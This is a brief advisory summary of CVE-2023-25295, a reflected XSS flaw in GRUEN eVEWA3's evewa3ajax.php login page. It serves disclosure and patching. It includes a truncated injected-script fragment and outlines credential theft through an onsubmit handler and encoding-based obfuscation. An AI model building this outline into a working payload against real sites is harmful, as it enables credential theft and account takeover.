CVE-2023-25295

Vulnerability

A reflected Cross-Site Scripting (XSS) vulnerability exists in the evewa3ajax.php endpoint of GRUEN eVEWA3 Community versions 31 through 53 [1]. The file parameter is vulnerable to injection, allowing arbitrary JavaScript to be reflected in the login form HTML. No authentication is required to trigger the vulnerability.

Exploitation

An attacker can craft a malicious URL containing a payload injected into the evewa3ajax.php parameter, such as evewa3ajax.php%22%3E%3Cscript%3E.... When a victim visits the URL, the injected script executes in the context of the login page. The attacker can use JavaScript event handlers like onsubmit to exfiltrate credentials entered into the login form to an attacker-controlled server [1]. The payload can be obfuscated using Base64 and URL encoding.

Impact

Successful exploitation allows the attacker to steal login credentials of any user who visits the crafted URL and submits the login form. This leads to account takeover (ATO) and escalation of privileges, as the attacker can then access the victim's account with the same level of access [1].

Mitigation

A security patch labeled "H1" has been applied across all affected versions (31 to 53) to fix the XSS vulnerability [1]. Users should ensure they are running the patched version. No workarounds are documented.